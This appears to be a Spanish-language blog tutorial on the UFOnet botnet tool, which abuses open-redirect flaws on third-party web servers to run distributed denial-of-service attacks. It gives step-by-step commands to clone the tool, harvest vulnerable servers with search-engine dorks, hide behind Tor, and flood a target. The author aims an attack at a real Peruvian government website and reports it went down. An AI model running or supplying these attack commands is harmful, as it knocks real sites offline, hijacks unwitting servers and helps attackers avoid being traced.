Saludos mis fieles lectores en esta oportunidad les traigo la herramienta llamada "UFOnet" la cual funciona como una "Botnet" de distribución de denegación de servicio, en nuestro sistema operativo GNU/Linux recolectando fallos de servidores web con la vulnerabilidad "Open Redirect" la cual enviara varias peticiones con grandes paquetes a la pagina objetivo.
http://cwe.mitre.org/data/definitions/601.html
Descarga
root@kali:~# git clone https://github.com/epsylon/ufonet
root@kali:~# cd ufonet
root@kali:~/ufonet# lsroot@kali:~/ufonet# cd ufonet
root@kali:~# ./ufonet
una ves descargado y comprobado que todo salio exitoso, vamos a configurar nuestro servidor añadiendo algunas configuraciones pero antes vamos a explicar algunos métodos que consta dicha herramienta.
Busqueda de Boots
como sabrán esta herramienta consta de una búsqueda de indexiaciones por medio de "Dorks" donde vamos a encontrar parámetros GET que son vulnerables para realizar este tipo de ataques como son:- 'check.cgi?url='
- 'proxy.php?url='
- 'validator?uri='
- 'checklink?uri='
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'bing'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'google'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yahoo'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yandex'
pero si deseamos hacer una búsqueda avanzada de las DORKS en general que contiene el repertorio de ufonet podemos hacer una búsqueda estándar para añadir mas paginas vulnerables las cuales son las siguientes:
root@kali:~/ufonet/ufonet# ./ufonet --sd 'dorks.txt'
Pero si deseamos tener una conexión anónima en este caso con un proxy que se directamente con ufonet esta implementado Tor, la cual podemos ejecutarlo de la siguiente manera.
./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:9150"
Si no lo tienen instalado pueden ver el siguiente tutorial donde enseño como configurar lo para Kali.
http://backtrack-omar.blogspot.pe/2015/09/instalar-tor-browser-en-kali-linux-20-y.html
Bueno primero que nada, vamos a ejecutar algunas conexiones defauld de pruebas de ataques para cargar el servidor y ver algunas peticiones que constan varias variaciones de estructuras, lo que haremos sera ejecutar un comando para obtener una búsqueda relacionada a una DORK como es la siguiente:
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url='
luego de ello vamos a ejecutar el siguiente comando para cargar los módulos de los servicios web vulnerables
root@kali:~/ufonet/ufonet# ./ufonet -i http://target.com
como vemos los archivos están siendo cargados de manera exitosa en nuestro servidor local, pero también podemos ejecutar el siguiente comando para elaborar un TEST en el siguiente servicio.
root@kali:~/ufonet/ufonet# ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"
sin duda este ataque es muy efectivo ya que va realizar consultas con las listas mas grandes que puede ver en el servidor y es uno de los mas efectos, pero también podemos ejecutar el siguiente que es aun mas prodigioso si es que se ha configurado bien el buscador de web's vulnerables, si deseamos lanzar un ataque mediante las conexiones de envíos por defauld podemos añadir lo siguiente:
root@kali:~/ufonet/ufonet# ./ufonet -a http://www.peru.gob.pe -r 10 -v
como vemos primero nos carga los paquetes de envios de las cabeceras, como acabamos de ver, pero al terminar lo siguiente, empezaremos a enviar las peticiones de acuerdo al tipo de threads que hemos realizado, como en mi caso fue 10, se ara una petición de 10 repeticiones:
como vemos en la siguiente imagen la herramienta consta de una website muy conocida llamada "downforeveryoneorjustme", donde nos dirá, si la web esta Down o UP como vemos nos dice que esta down o caída.
pero como siempre es bueno hecha ojo en los servicios paso a verificarlo:
Lo interesante es los paquetes que enviá y la respuesta que recibe.
entonces el Test del servidor se ha realizado correctamente. espero les aya gustado este POST.
Saludos!
0 comentarios:
Publicar un comentario